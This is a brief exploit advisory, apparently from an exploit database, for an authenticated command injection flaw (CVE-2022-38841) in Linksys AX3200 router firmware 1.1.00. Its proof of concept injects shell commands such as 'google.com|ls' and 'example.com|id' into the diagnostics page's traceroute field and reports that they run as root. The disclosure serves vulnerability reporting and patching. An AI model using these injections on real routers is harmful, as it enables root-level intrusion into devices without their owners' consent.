# Exploit Title: Linksys AX3200 V1.1.00 - Command Injection# Date: 2022-09-19# Exploit Author: Ahmed Alroky# Author: Linksys# Version: 1.1.00# Authentication Required: YES# CVE : CVE-2022-38841# Tested on: Windows# Proof Of Concept:1- login into AX3200 webui
2- go to diagnostics page
3- put "google.com|ls" to perform a traceroute
4- you will get the filelistand also you can try"example.com|id" to ensure that all commands executed as a root user
